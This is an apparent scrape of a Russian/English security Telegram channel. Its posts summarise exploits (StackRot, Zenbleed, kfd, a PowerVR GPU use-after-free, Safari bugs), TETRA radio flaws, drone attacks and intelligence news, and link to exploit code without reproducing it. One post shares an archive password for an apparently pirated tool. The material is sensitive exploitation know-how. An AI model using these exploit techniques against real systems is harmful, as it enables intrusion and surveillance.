Shizoprivacy

Posts

Date Content Media
2023-08-26 23:30:40
The owner of this channel has been inactive for the last 1 month. If they remain inactive for the next 7 days, they may lose their account and admin rights in this channel. The contents of the channel will remain accessible for all users.
2023-08-01 14:03:29
Хочу закончить посты с годной, по моему мнению, конференции двумя интересными видео. Inside Apple's Lighting: JTAGing The iPhone for Fuzzing And Profit где рассказывается что такое lightning, как он работает и как его использовать для различных нужд, в том числе и для извлечения информации.По данной теме друже Шизо, поклон ему, делал постAffordable EMFI Attacks Against Modern IoT Chips. Здесь рассказывают что нужно и как провести EMFI (Electromagnetic Fault Injection) атаку на энергоэффективный чип Espressif ESP32-C3 и расскажут про профиты от таких атак (их много ;)). Репозиторий со списком аппаратуры и ПО тут
2023-08-01 06:52:38
😅Не знаю как можно смотреть без улыбки на такие новости/расследования.😅I don't know how you can look at such news/investigations without a smile.📑Who Paid for a Mysterious Spy Tool? The F.B.I., an F.B.I. Inquiry Found."When The New York Times reported in April that a contractor had purchased and deployed a spying tool made by NSO, the contentious Israeli hacking firm, for use by the U.S. government, White House officials said they were unaware of the contract and put the F.B.I. in charge of figuring out who might have been using the technology.After an investigation, the F.B.I. uncovered at least part of the answer: It was the F.B.I."🤣📑FBI Ordered to Find Out Which Agency Disobeyed White House in Secret Deal, Finds Out It Was Itself."Now, several months later, the bureau’s investigation is complete, and it turns out that the agency that disobeyed the White House and purchased the creepy NSO tool was...the FBI."🤣#NSO_Group #unit8200 #FBI #investigation #WhiteHouse #spy_tools #Pegasus_Spyware Images
2023-07-31 15:25:31
⛓1day link Private Shizo(fully free)
2023-07-31 14:40:39
🕵️‍♂️Cyber4Drone: A Systematic Review of Cyber Security and Forensics in Next-Generation Drones#UAV #drone #forensics #artifacts #cellebrite #UEFD_4PC #Magnet_AXIOM #ExtractDJI #Oxygen_Forensics #MKO #security #privacy #integrity #confidentiality #availability #GCS #LOS #BLOS #ADS_B #Threat_Model #Jamming #Cloning #GPS_Spoofing #SW #RF #SkyGrabber #SDR #Deauth #DoS #ESC_PWM #sensor #MITM
2023-07-31 14:40:36
#UAV #drone #forensics #artifacts #cellebrite #UEFD_4PC #Magnet_AXIOM #ExtractDJI #Oxygen_Forensics #MKO #security #privacy #integrity #confidentiality #availability #GCS #LOS #BLOS #ADS_B #Threat_Model #Jamming #Cloning #GPS_Spoofing #SW #RF #SkyGrabber #SDR #Deauth #DoS #ESC_PWM #sensor #MITM Images Images Images Images Images Images Images Images Images Images
2023-07-29 21:20:43
None
2023-07-29 21:20:08
🤔"Let’s take a computer example: EternalBlue. That’s the NSA code name for an exploit against the Windows operating system, used by the NSA for at least five years before 2017, when the Russians stole it from that agency." - Bruce Schneier told in the book: "A Hacker's Mind: How the Powerful Bend Society's Rules, and How to Bend them Back"#NSA #EternalBlue #USA #Russia #Windows #SMB #vulnerability #exploitation #TheShadowBrokers #WannaCry #0day Images Images
2023-07-29 13:34:23
📡The E-Intelligence System"Electronic Intelligence (ELINT), often known as E-Intelligence, is intelligence obtained through electronic sensors. Other than personal communications, ELINT intelligence is usually obtained. The goal is usually to determine a target's capabilities, such as radar placement. Active or passive sensors can be employed to collect data. A provided signal is analyzed and contrasted to collected data for recognized signal types.The information may be stored if the signal type is detected; it can be classed as new if no match is found. ELINT collects and categorizes data. In a military setting (and others that have adopted the usage, such as a business), intelligence helps an organization make decisions that can provide them a strategic advantage over the competition. The term "intel" is frequently shortened. The two main subfields of signals intelligence (SIGINT) are ELINT and Communications Intel (COMINT)."#Intelligence #SIGINT #ELINT #radar #signal #Electronic_Warfare #UAV #ESM
2023-07-29 13:33:18
#Intelligence #SIGINT #ELINT #radar #signal #Electronic_Warfare #UAV #ESM Images Images Images Images
2023-07-28 22:08:15
|SaaS attack techniques|"Без понимания как образом совершаются наступательные действия атакующей стороны, трудно выстроить крепкую систему безопасности" - народная мудрость🛡Данный репозитрий нацелен на сбор методов атак Software as a service (SaaS) для моделирования будущих атак на относительно новую поверхность атаки, расширяя кругозор как атакующей, так и защищающих сторон, и конечно оные могут пригодиться исследователям безопасности в целом. Тезисы, озвучиваемые авторами:💾Избегайте высокоэффективных средств контроля💾Ищите функции, которыми можно злоупотреблять в долгосрочной перспективе, а не ошибки, которые будут быстро исправлены💾Выйдите за рамки примерно дюжины основных SaaS-приложенийМожно в целом сократить до: "лучше поразмыслить в таком ключе, как другие не могут вообразить и не гнаться за 0-day эксплойтами, а думать о более долгоиграющих и недорогих способах обходах защиты". Так же можно адаптировать это и для защищающейся стороны, ибо далеко не всегда нужно искать с "потом на лице" способы защиты, оптимальнее подумать в том направлении, что редко рассматривается.🔖Также важно понимать откуда ноги растут и по возможности читать предысторию проектов, если таковая имеется, как в данном случае."Without understanding how offensive actions of the attacking side are carried out, it is difficult to build a strong security system" - folk wisdom🛡This repository is aimed at collecting Software as a service (SaaS) attack methods to simulate future attacks on a relatively new attack surface, expanding the horizons of both attacking and defending parties, and of course these can be useful to security researchers in general. Theses voiced by the authors:💾Avoid highly effective controls💾Look for features that can be abused in the long run, not bugs that will be fixed quickly💾Go beyond about a dozen basic SaaS applicationsYou can generally reduce it to: "it's better to think in this way, as others cannot imagine and not chase 0-day exploits, but think about longer-lasting and inexpensive ways to bypass protection." It is also possible to adapt this for the defending side, because it is not always necessary to look for ways of protection with "sweat on the face", it is more optimal to think in the direction that is rarely considered.🔖It is also important to understand where the legs are growing from and, if possible, read the background of the projects, if any, as in this case.#SaaS #networkless_attacks #DFIR #security_research #blue_team #red_team #Reconnaissance #Initial_Access #Execution #Persistence #PE #Defense_Evasion #Credential_Access #Discovery #Lateral_Movement #Exfiltration
2023-07-28 22:08:09
#SaaS #networkless_attacks #DFIR #security_research #blue_team #red_team #Reconnaissance #Initial_Access #Execution #Persistence #PE #Defense_Evasion #Credential_Access #Discovery #Lateral_Movement #Exfiltration Images
2023-07-28 16:36:20
😭Де-onion. Как ловят администраторов сайтов в TorНаписал статью для xakep.ru про идентификацию владельцев луковичных ресурсов. Затронул темы поисковиков, теневой экономики, фингерпринтинга, ловушек и много другого. В ближайшем времени переведу на английский язык.🙏Выражаю благодарность каналам 0% Privacy и Dana Scully, за предоставленные материалы и отдельное спасибо редакторам xakep.ru за правки.Читать Images
2023-07-28 16:22:27
🔥🔥🔥exploitation write-up & exploit code of StackRot (CVE-2023-3269) now available(Github repo)!
2023-07-28 16:10:55
|TETRA:BURST|📡Многие уже успели обсудить уязвимости в цифровом стандарте "TETRA"(включает в себя алгоритмы шифрования радиоинтерфейса(Air Interface Encryption, AIE): TEA1, TEA2, TEA3 и TEA4, а также алгоритмы аутентификации TETRA - TAA1 и создавалась по принципам мобильной связи ), которые получили кодовое имя "TETRA:BURST".Однако стоит поставить акцент на том, что не мало людей почему-то когда слышат "секретная криптография", то начинают думать о какой-то мифической защищенности данных, зашифрованных оной(понятное дело, что пропетых криптологов эти сказки лишь забавляют).Этот случай не стал исключением и еще более интересным является факт того, что CVE-2022-24402(в алгоритме TEA1 обнаружена часть, приводящая к уменьшению эффективной энтропии ключа, то есть можно было исходный 80-битный ключ уменьшить до размера ключа который можно довольно легко сбрутфорсить, к примеру до 32 бит) была по сути бэкдором и позволяла атакующему перехватывать или манипулировать радиотрафиком(внедрять вредоносный трафик), осуществляя полный взлом шифра . Также исследователи проанализировали утечки Сноудена, в которых была информация указывающая на что еще тогда АНБ и GCHQ рассматривали TETRA, как объект для атак. Стоит упомянуть еще CVE-2022-24404, приводящую к "malleability" атаке из-за отсутствия аутентификации по шифротексту в AIE , а также CVE-2022-24401, приводящую к "decryption oracle" атаке из-за публично транслируемого без проверки подлинности сетевого времени, которое используется в генераторе потока ключей AIE. Обе эти проблемы позволяют атакующему перехватывать и внедрять вредоносные сообщения для всего трафика, который не защищен E2EE.С этого момента интересно, ибо как указывают исследователи, данные уязвимости закрываются патчами fw радио. Как известно, в Р-187-П1/Р-187-П1E имеется на борту TETRA(передача речи в дуплексном режиме, файловый обмен, обмен навигационной информацией, передача текстовых сообщений в реальном масштабе времени и сигнально-кодовая связь) , для которой требуются ретрансляторы или в случае отсутствия оных - DMO(в том случае, если радейка оказывается у противника, то он может в этом режиме еще и с ППРЧ маскироваться под оного, однако важно достаточное количество ретрансляторов в округе, причем перед данными манипуляциями важно сбросить в заводское состояние каналы на радейке...), предполагая прямую связь TETRA. Когда будет обновление для fw - хороший вопрос и будет ли оно вообще🤷🏼‍♂️Такой же вопрос и к изделиям ОНИИП. Для контрразведки же могла использоваться уязвимость CVE-2022-24403 или схожая, направленная на деанонимизацию пользователя TETRA(мониторинг и передвижения) за счет слабой обфускации id радиостанций.Примечательно, что вероятность обнаружения следов эксплуатации CVE-2022-24402 и CVE-2022-24403 в случае атаки - близка к нулю. Подробнее про сами уязвимости можно почитать на сайте и в скором будущем скачать материалы выступления на BlackHat USA 2023 "Redacted Telecom Talk". Однако "Proof-of-concept attack code will not be released due to the potential for abuse".Подводя итоги, стоит отметить еще раз: секретный криптографический алгоритм ≠ криптостойкий, а также важно использовать адекватное и прошедшее криптоанализ E2EE.З.Ы. Для декодирования незашифрованного TETRA не требуется дорогое оборудование, даже дешевое SDR с таким справится в лице RTL-SDR , кто более искушен, то можно не мелочиться и использоваться LimeSDR(можно и Mini 2.0), BladeRF и так далее для проведения полноценных атак аудита.#SIGINT #NSA #GCHQ #cryptography #expoitation #TETRA #deanonymization #counter_intelligence #RE
2023-07-28 16:10:52
#SIGINT #NSA #GCHQ #cryptography #expoitation #TETRA #deanonymization #counter_intelligence #RE
2023-07-28 08:27:22
|AppSec Ezine|📰493rd EditionRelease Date: 28/07/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-07-28 03:05:09
📕Preventing Web Application Access Control Abuse#CSA #ACSC #CISA #NSA #Web_Apps #vulnerabilities #IDOR #IR #IRP #network #expoitation #malicious_actors
2023-07-28 03:04:59
#CSA #ACSC #CISA #NSA #Web_Apps #vulnerabilities #IDOR #IR #IRP #network #expoitation #malicious_actors Images Images Images Images
2023-07-27 10:11:31
🕵️‍♂️United States Signal Intelligence Directive 1#USA #NSA #Intelligence #SIGINT #COMINT #ELINT #USSID #CCP
2023-07-27 10:11:11
#USA #NSA #Intelligence #SIGINT #COMINT #ELINT #USSID #CCP Images Images Images Images
2023-07-27 01:11:45
🤔Продолжение событий в Израиле приобретают новые краски: "Более 1800 выпускников Unit 8200 присоединяются к ветеранам военного формирования и киберперсоналу наступательных операций, предупреждая об угрозе существованию..."🤔Continuation of events in Israel acquire new colors: "More than 1,800 graduates of Unit 8200 join the veterans of the military formation and the offensive cyber personnel, warning against the existential threat..."#Israel #Netanyahu #YoavGalant #IDF #unit8200 #Intelligence Images
2023-07-26 02:28:51
📕On the Anonymity of Peer-To-Peer Network Anonymity Schemes Used by Cryptocurrencies#P2P #cryptocurrencies #anonymity #deanonymization #Bayesian #network #Bitcoin #Dandelion #DandelionPlusPlus #Lightning_Network
2023-07-26 02:28:46
#P2P #cryptocurrencies #anonymity #deanonymization #Bayesian #network #Bitcoin #Dandelion #DandelionPlusPlus #Lightning_Network Images Images Images Images
2023-07-25 14:13:04
📡The BYTE, Volume 11, Issue 3 #USA #780thMIBN #780thMIBDE #125CPB #781stMIBN #11thCYBN #782dMIBN #Intelligence #SIGINT #OCO #DevOps #RF #Workflow
2023-07-25 14:11:34
#USA #780thMIBN #780thMIBDE #125CPB #781stMIBN #11thCYBN #782dMIBN #Intelligence #SIGINT #OCO #DevOps #RF #Workflow Images Images Images Images
2023-07-24 21:05:49
💥Появились подробности об "Operation Triangulation", теперь стало известно еще об одной ядерной баге(XNU) - CVE-2023-38606, приводящей к изменение чувствительного состояния ядра(хотя на самом деле все может быть по-другому, зная политику раскрытия подробностей о багах в их продуктах) и замеченной как 0-day ITW в цепочке сплоитов, которыми пробивали сами знаете кого.💥Details of "Operation Triangulation" have appeared, now it has become known about another kernel bug (XNU) - CVE-2023-38606, which leads to a modify sensitive kernel state (although in fact everything may be different, knowing the policy of disclosing details about bugs in their products) and noticed as 0-day ITW in the exploit chain that were exploited you know who.🛡Apple security updates: iOS 16.6/iPadOS 16.6, macOS Ventura 13.5, iOS 15.7.8/iPadOS 15.7.8, macOS Monterey 12.6.8 & macOS Big Sur 11.7.9.#exploitation #iOS #XNU #OperationTriangulation Images
2023-07-24 20:16:36
🤷🏼‍♂️CVE-2023-37450(Safari(Webkit) 0-day, may have been actively exploited(ITW)) maybe fixed in commit 4f99c06 "Cherry-pick 259548.856@safari-7615-branch (c3d2e3627b45). https://bugs.webkit.org/show_bug.cgi?id=259231" in WebKitGTK 2.40.4 and WPE WebKit 2.40.4.CallVarargs should identify that it can read inline call frame arguments.What's new in WebKitGTK 2.40.4?💾Fix a bug in JavaScript reading variable arguments in a call.🛡WebKitGTK and WPE WebKit Security Advisory WSA-2023-0006 Images
2023-07-24 16:26:19
🔥🔥🔥Zenbleed(UAF in AMD Zen2 processors, exploitation included, It turns out that with precise scheduling, you can cause some processors to recover from a mispredicted vzeroupper incorrectly)"If you remove the first word from the string "hello world", what should the result be? This is the story of how we discovered that the answer could be your root password!"First of all you need to trigger something called the XMM Register Merge Optimization, followed by a register rename and a mispredicted vzeroupper.⚠️We now know that basic operations like strlen, memcpy and strcmp will use the vector registers - so we can effectively spy on those operations happening anywhere on the system! It doesn’t matter if they’re happening in other virtual machines, sandboxes, containers, processes, whatever! This works because the register file is shared by everything on the same physical core. In fact, two hyperthreads even share the same physical register file.🔖Exploit code here.
2023-07-24 01:37:42
🤔Я не политик и не военный, так что не берусь как-то рассуждать по поводу происходящего на данный момент в Израиле, просто приложу скриншоты в отношении ЦАХАЛа и в частности unit 8200, взятые из твиттера "8200 protest". Данные новости связаны так или иначе с разведывательными технологиями и дальнейшими прогрессивными решениями(если уж возник вопрос, почему такое выкладывается на канале).🤔I am not a politician and not a military man, so I do not undertake to somehow speculate about what is happening at the moment in Israel, I will just attach screenshots regarding the IDF and in particular unit 8200, taken from the Twitter "8200 protest". These news are connected in one way or another with intelligence technologies and further progressive solutions (if the question arises, why is this being posted on the channel).#Israel #Netanyahu #YoavGalant #IDF #unit8200 #Intelligence Images Images Images Images Images Images Images Images Images Images
2023-07-22 18:16:49
🔥Shifting boundaries: Exploiting an Integer Overflow in Apple SafariIn this blog post, Vignesh Rao describe a method to exploit an integer overflow in Apple WebKit due to a vulnerability resulting from incorrect range computations when optimizing Javascript code. He show how to convert this integer overflow into a stable OOB read/write on the JavaScriptCore heap. We then show how to use the OOB read/write to create addrof and fakeobj primitives(for more details).🛡Fixed in commit(April 2021, then patched in the May 2021 update to Safari) : 4cbfe33 "Fix B3 strength reduction for shl"If an overflow occurs, then the upper and lower bounds are set to the Max and Min value of that type respectively.
2023-07-22 18:13:21
📡Un-Rocking Drones: Foundations of Acoustic Injection Attacks and Recovery ThereofJinseob Jeong (KAIST, Agency for Defense Development), Dongkwan Kim (Samsung SDS), Joonha Jang (KAIST), Juhwan Noh (KAIST), Changhun Song (KAIST) and Yongdae Kim (KAIST) discovered that sampling jitter, which refers to the inconsistent timing delay in retrieving sensor values, has a significant impact on drone crashes during the attack. Note that while any real-time system needs to satisfy its real-time requirements, it does have sampling jitter owing to manufacturing errors or scheduling/operational overheads. The sampling jitter is negligible in terms of real-time requirements; however, we found that it became critical for drones being attacked.#UAV #Drone #MEMS #IMU #acoustic_injection_attack #sensor #sampling_jitter #Physical_Analysis #Implication_Analysis #spectrum_analysis
2023-07-22 18:12:14
#UAV #Drone #MEMS #IMU #acoustic_injection_attack #sensor #sampling_jitter #Physical_Analysis #Implication_Analysis #spectrum_analysis Images Images Images Images
2023-07-21 17:03:39
🧅TorMult: Introducing a Novel Tor Bandwidth Inflation Attack"This paper proposes a new inflation attack vector in Tor, referred to as TorMult, which enables inflation of measured bandwidth. The underlying attack technique exploits resource sharing among Tor relay nodes and employs a cluster of attacker-controlled relays with coordinated resource allocation within the cluster to deceive bandwidth measurers into believing that each relay node in the cluster possesses ample resources. Researchers propose two attack variants, C-TorMult and D-TorMult, and test both versions in a private Tor test network. Their evaluation demonstrates that an attacker can inflate the measured bandwidth by a factor close to n using C-TorMult and nearly half n*N using D-TorMult, where n is the size of the cluster hosted on one server and N is the number of servers.."#Tor #Bandwidth_Inflation_Attack #bandwidth #nodes #relays #deanonymization #network #allocation #inflation
2023-07-21 17:03:00
#Tor #Bandwidth_Inflation_Attack #bandwidth #nodes #relays #deanonymization #network #allocation #inflation Images Images Images
2023-07-21 14:55:05
🔥 kfd,(kernel file descriptor) is a project to read and write kernel memory on Apple devices. It leverages various vulnerabilities that can be exploited to obtain dangling PTEs, which will be referred to as a PUAF primitive, short for "physical use-after-free". Then, it reallocates certain kernel objects inside those physical pages and manipulates them directly from user space through the dangling PTEs in order to achieve a KRKW primitive, short for "kernel read/write". The exploit code is fully contained in a library, libkfd, but the project also contains simple executable wrappers for iOS and macOS.🔥🔥🔥CVE-2023-32434 exploitation(XNU 0-day ITW actively exploited)💥CVE-2023-23536 exploitation
2023-07-21 13:43:21
Постучался ко мне с утра один из читателей "Форензик тулзов" с вопросом: "... а можно вот шпаргалки эти в виде книжки, чтобы просто раздать технарям своим.."Как по мне- хорошая идея, но только была бы она интересна широкой аудитории, чтоб заморачиваться на целую книжку? И родилась идея маленького эксперемента: чтобы проверить, а действительно такая методичка была бы нужна, открываю краудфайдинговый сбор! 350 рублей (Стоимость чашки кофе) и если наберётся до 1 августа хотя-бы 100 человек, то они получат электронную версию книжки "Шпаргалок цифрового детектива" с именной благодарностью в сентябре этого года. Ну и конечно же даст стимул делать дальше усеченную версию для канала. Поддержать монетой можно тутВ поле "сообщение" указывайте пожалуйста свой ник в ТГ, чтобы знать кого благодарить :) Images
2023-07-21 13:13:11
📕Security Audit of Mozilla K-9K-9 Mail is an open source email client for Android focused on making it easy to chew through large volumes of email.#7ASecurity #Mozilla #OSTIF #Thunderbird #email #audit #fuzzing #ossfuzz #CodeQL #semgrep #pentest #security #vulnerabilities #threat_model #exploitation #Supply_Chain
2023-07-21 13:13:07
#7ASecurity #Mozilla #OSTIF #Thunderbird #email #audit #fuzzing #ossfuzz #CodeQL #semgrep #pentest #security #vulnerabilities #threat_model #exploitation #Supply_Chain Images Images Images Images Images Images Images
2023-07-21 08:58:36
|AppSec Ezine|📰492rd EditionRelease Date: 21/07/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-07-20 13:42:55
😔Legends never die.#Kevin_Mitnick Images
2023-07-19 22:28:47
🔥Anatomy of Lockdown Mode#0x41con #protection #security #privacy #Apple #iOS #iPadOS #macOS #Lockdown_Mode #implenetation #Dylibs #DSC_Dylibs #WebKit #Safari
2023-07-19 22:28:28
#0x41con #protection #security #privacy #Apple #iOS #iPadOS #macOS #Lockdown_Mode #implenetation #Dylibs #DSC_Dylibs #WebKit #Safari Images Images Images Images Images Images Images Images Images
2023-07-19 18:30:49
💥Chrome actively exploited 0-day vulnerability (CVE-2023-2033: type confusion in V8 engine, here fix)🤙Thx @hosselot Images
2023-07-19 13:46:50
🔥[PowerVR GPU]Page UAF by logic bug (PMRChangeSparseMemOSMem and PVRSRV_MMap, CVE-2023-21216) Non-privileged users can access PowerVR mobile graphic device(PowerVR GE8320 GPU) drivers locally. By interacting with ioctl functions PMRChangeSparseMemOSMem and driver mmap handler, a malicious user may exploit the kernel by page UAF.Users may specify the uiFlags as SPARSE_RESIZE_FREE to let the driver free allocated pages by _FreeOSPages. However, the pages are still used by PVRSRV_MMap, meaning a malicious user may call mmap first and PMRChangeSparseMemOSMem later and trigger the page UAF.📲Test device: RedMi 9A, PVR GPU Version 1.11, SPL 2023-02-01 (latest)⚠️Impact: Since a malicious user can read or write arbitrary UAF pages, LPE (universal root) Images Images Images Images
2023-07-18 21:41:31
🕵️‍♂️Вчера(18 июля 2023 года) Бюро Промышленности и Безопасности Министерства Торговли(Bureau of Industry and Security(BIS)) добавило четыре Европейские компании в список юридических лиц(список организаций), занимающихся торговлей эксплойтов, которые использовались в шпионским ПО Predator для получения доступа к информационным системам, угрожающими безопасности и приватности частных лиц и организаций по всему миру.1️⃣Intellexa SA в Греции2️⃣Cytrox Holdings Crt в Венгрии 3️⃣Intellexa Limited в Ирландии4️⃣Cytrox AD в Северной Македонии#BIS #security #privacy #spyware #Predator #Intellexa #Cytrox #expoitation
2023-07-18 21:41:00
🕵️‍♂️ Yesterday (July 18, 2023) Commerce Department’s Bureau of Industry and Security(BIS) added four European companies to the list of legal entities (list of organizations) engaged in trading exploits that were used in Predator spyware to gain access to information systems that threaten the security and privacy of individuals and organizations around the world.1️⃣ Intellexa SA in Greece2️⃣ Cytrox Holdings Crt in Hungary3️⃣ Intellexa Limited in Ireland4️⃣ Cytrox AD in Northern Macedonia#BIS #security #privacy #spyware #Predator #Intellexa #Cytrox #expoitation Images Images
2023-07-18 14:29:56
🔥 Tarlogic начали публиковать потихоньку материалы исследования по определению ранее сопряженных Bluetooth-устройств и поддерживают ли они доверительные отношения, чтобы было представлено в новом методе Bluetooth-атак "BlueTrust".💾Расширение Wireshark с диссектором для дебаг-сообщений драйвера Bluetooth от производителя Broadcom💾Расширение для Scapy фреймворка с сообщениями Bluetooth и утилитами💾Служба Systemd и правила udev для Broadcom Bluetooth драйверов.🔥 Tarlogic began to publish research materials on the sly to determine previously paired Bluetooth devices and whether they maintain a trusting relationship, so that it would be presented in the new Bluetooth attack method "BlueTrust".💾 Wireshark extension with a dissector for Bluetooth driver debug messages from Broadcom manufacturer💾 Extension for Scapy framework with Bluetooth messages and utilities💾 Systemd service and udev rules for Broadcom Bluetooth drivers.#Bluetooth #expoitation #BlueTrust #BIAS #KNOB #spoof #bypass Images
2023-07-17 23:42:24
🕵️‍♂️iOS Forensic Toolkit Tips & TricksВ данной статье Вадим Каталов(генеральный директор ака CEO ElcomSoft, @v_katalov) рассказывает про подготовку и установку, дополнительные hw среды, а также про безопасное и эффективное использование Elcomsoft iOS Forensic Toolkit(EIFT)In this article, Vadim Katalov (CEO of ElcomSoft, @v_katalog) talks about the preparation and installation, additional hw environments, as well as about the safe and effective use of Elcomsoft iOS Forensic Toolkit(EIFT)🤣"Elcomsoft iOS Forensic Toolkit is an all-in-one software that aids in extracting data from iOS devices, yet it is still far away from being a one-button solution that many experts keep dreaming of."#forensics #extracting_data #evidence #mobile #iOS #EIFT #FS #Keychain #ELA #DFU #fw #checkm8 #checkra1n #exploitation Images Images
2023-07-17 20:10:29
🌐5G Network Slicing: Security Considerations for Design, Deployment, and Maintenance#ESF #NSA #CISA #security #network_slicing #cellural_Network #5G #E2E_slicing #Threat_Vector #O_RAN
2023-07-17 20:09:54
#ESF #NSA #CISA #security #network_slicing #cellural_Network #5G #E2E_slicing #Threat_Vector #O_RAN Images Images Images Images
2023-07-16 16:08:30
Complete intrusion investigations with speed, accuracy, and simplicity.Passw : uCare@Pwn3rs
2023-07-16 01:19:34
📡Dishing Out DoS: How to Disable and Secure the Starlink User Terminal#security #satellite #Starlink #terminal #network #fuzzing #expoitation #DoS
2023-07-16 01:19:17
#security #satellite #Starlink #terminal #network #fuzzing #expoitation #DoS Images Images Images Images
2023-07-15 14:09:22
Слушают ли меня злоумышленники?🎧Статья про прослушивание звуков с телефона с использованием датчиков движения и машинного обучения, в отличие от прослушивания микрофона это не требует больших привилегий.Русская версия.Надеюсь вам было полезно.❤️Are intruders listening to me? 🎧 An article about listening to sounds from a phone using motion sensors and machine learning, unlike listening to a microphone it doesn't require a lot of privileges.English version.Hope you found it useful.❤️ #android #anonymity #attacks #mobile #security #wireless_hacking #wiretap
2023-07-15 14:05:42
🤷🏼‍♂️На XSS(экс DaMaGeLaB) сейчас собирают средства на исправление кода Tox'а в ключе безопасности(фикс багов в в системе безопасности), после как ручного и автоматизированного аудита кода могу сказать(как саму реализацию toxcore библиотеки на С, так и клиенты по типу qTox), что работы там непочатый край и могу лишь пожелать удачи тем, кто возьмется за это дело. 🤷🏼‍♂️On XSS (ex DaMaGeLaB), funds are now being raised to fix the Tox code in the security key (fix security bugs), after a manual and automated code audit(both the implementation of toxcore library itself in C, and clients of the qTox type), I can say that there is a lot of work there and I can only wish good luck to those who take up this case.#DaMaGeLaB #security #IM #Tox Images
2023-07-14 15:25:50
|AppSec Ezine|📰491rd EditionRelease Date: 14/07/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-07-14 15:18:59
🕵️‍♂️Ваш покорный слуга скачал все доступные на данный момент презентации с DFRWS USA 2023 и укомплектовал в архив.🕵️‍♂️Your humble servant downloaded all currently available presentations from DFRWS USA 2023 and archived them.#DFIR #dfrwsUSA23 #forensics #Linux #ransomware #memory #Quasi_Instantaneous #SaaS #mobile #backup #Android #iOS #Windows #images #browser #cloud #DB #log #network #RE #Heuristic #ICS #IoT #cameras #Hikvision #Dashcam #CV #emulation #AGP #cRGB_Mem #ML #taxonomy #tracker_application #2FA
2023-07-14 15:15:17
#DFIR #dfrwsUSA23 #forensics #Linux #ransomware #memory #Quasi_Instantaneous #SaaS #mobile #backup #Android #iOS #Windows #images #browser #cloud #DB #log #network #RE #Heuristic #ICS #IoT #cameras #Hikvision #Dashcam #CV #emulation #AGP #cRGB_Mem #ML #taxonomy #tracker_application #2FA Images
2023-07-14 00:35:16
🕵️‍♂️Недавно закончилась конференция по цифровой криминалистике DFRWS USA 2023(9-12 июля).На данной конференции был довольно неплохой воркшоп для начинающих по форензике Линукса "Learning Linux Forensic Analysis and Why it Matters", на котором рассматривался скомпрометированный Hadoop-кластер(Linux Hadoop Cluster) со скомпрометированными кредами, EoP, боковым перемещением и различными техниками закрепления. 🕵️‍♂️ The Digital Forensics conference DFRWS USA 2023 (July 9-12) has recently ended.At this conference, there was a pretty good workshop for newbies on Linux forensics "Learning Linux Forensic Analysis and Why it Matters", which considered a compromised Hadoop cluster (Linux Hadoop Cluster) with compromised creds, EoP, lateral movement and various persistent techniques.#DFIR #dfrwsUSA23 #forensics #Evidence #Linux #InitialAccess #PrivilegeEscalation #Persistence #LateralMovement
2023-07-14 00:34:10
#DFIR #dfrwsUSA23 #forensics #Evidence #Linux #InitialAccess #PrivilegeEscalation #Persistence #LateralMovement Images Images Images Images
2023-07-13 16:30:35
🛡National Cybersecutiry Strategy Implementation Plan#WhiteHouse #strategy #security #privacy #NCS #NCSIP #threats #CII #CISA #FBI #NIST #ransomware
2023-07-13 16:30:08
|National Cybersecutiry Strategy Implementation Plan|🛡Белый Дом опубликовал информационный бюллетень "2023 National Cybersecurity Strategy Implementation Plan"(NCSIP), направленный на отображения видения и подхода по обеспечению безопасного цифрового будущего жителей США.В предыдущем документе "National Cybersecurity Strategy"(NCS) было выдвинуто предложение по тому, каким образом США должно распределять роли, обязанности и ресурсы в киберпространстве:1️⃣Обеспечение того, чтобы крупнейшие, наиболее способные и располагающие наилучшими возможностями организации - в государственном и частном секторах – брали на себя большую долю бремени по снижению киберрисков, то есть перенесение последствий плохой кибербезопасности с наиболее уязвимых на более надежные решения с повышенной ответственностью для вендоров ПО.2️⃣Усиление стимулов для поощрения долгосрочных инвестиций в кибербезопасность. Тут все довольно понятно и как было озвучено в NCS, что данные мероприятия направлены на поддержание лидирующих позиций США в области инноваций в безопасности и устойчивых технологий инфраструктуры следующего поколения В NCSIP уже идет речь о плане реализации данного видения, включая хорошо описанные и эффективные федеральные инициативы от защиты рабочих мест в США до создания квалифицированной кибер-рабочей силы(в основном речь про цифровую экономику), причем каждая из них закреплена за ответственным учреждением и имеет сроки завершения.Ниже инициативы из плана, которые организованы по основным направлениям NCS и стратегическим целям(тут уже было, так что не развернуто):1️⃣Защита КИИ2️⃣Разрушение и ликвидация субъектов, представляющих угрозу3️⃣Формирование рыночных сил, обеспечение безопасности и жизнестойкости4️⃣Инвестирование в устойчивое будущее5️⃣Налаживание международных партнерств для достижения общих целей🛡The White House has published the newsletter "2023 National Cybersecurity Strategy Implementation Plan" (NCSIP), aimed at displaying a vision and approach to ensure a secure digital future for US residents.In the previous document "National Cybersecurity Strategy" (NCS), a proposal was put forward on how the United States should allocate roles, responsibilities and resources in cyberspace:1.Ensuring that the largest, most capable and best-equipped organizations – in the public and private sectors - assume a greater share of the burden of reducing cyber risks, that is, shifting the consequences of poor cybersecurity from the most vulnerable to more reliable solutions with increased responsibility for software vendors.2.Strengthening incentives to encourage long-term investments in cybersecurity. Everything is pretty clear here, and as it was announced in the NCS, these events are aimed at maintaining the leading positions of the United States in the field of security innovations and sustainable next-generation infrastructure technologies NCSIP is already talking about a plan to implement this vision, including well-described and effective federal initiatives from protecting jobs in the United States to creating a skilled cyber workforce (mainly talking about the digital economy), and each of them is assigned to a responsible institution and has completion dates.Below are the initiatives from the plan, which are organized according to the main directions of the NCS and strategic goals (it has already been here, so it has not been deployed):1️⃣Defending of CII2️⃣Disrupting and Dismantling Threat Actors3️⃣Shaping Market Forces and Driving Security and Resilience4️⃣Investing in a Resilient Future5️⃣Forging International Partnerships to Pursue Shared Goals#WhiteHouse #strategy #security #privacy #NCS #NCSIP #threats #CII #CISA #FBI #NIST #ransomware
2023-07-13 16:27:51
#WhiteHouse #strategy #security #privacy #NCS #NCSIP #threats #CII #CISA #FBI #NIST #ransomware Images Images Images Images
2023-07-12 19:11:27
📕Studies in Intelligence 67, No. 2#CIA #Intelligence #security #Congress #USSR #USA #China #Top_Secrets #spying #hacking #history #Hitler
2023-07-12 19:11:16
